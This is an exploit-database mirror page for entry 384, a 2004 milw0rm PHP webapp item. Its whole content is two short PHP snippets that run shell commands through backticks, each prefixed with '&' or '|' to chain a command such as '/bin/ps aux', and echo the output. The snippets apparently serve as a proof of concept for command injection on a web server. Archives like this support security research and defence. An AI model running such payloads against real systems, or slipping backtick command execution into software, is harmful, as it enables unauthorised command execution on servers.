exploit-db-mirror/platforms/php/webapps/384.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

12 lines
153 B
Text
Executable file

<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>
<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
# milw0rm.com [2004-08-08]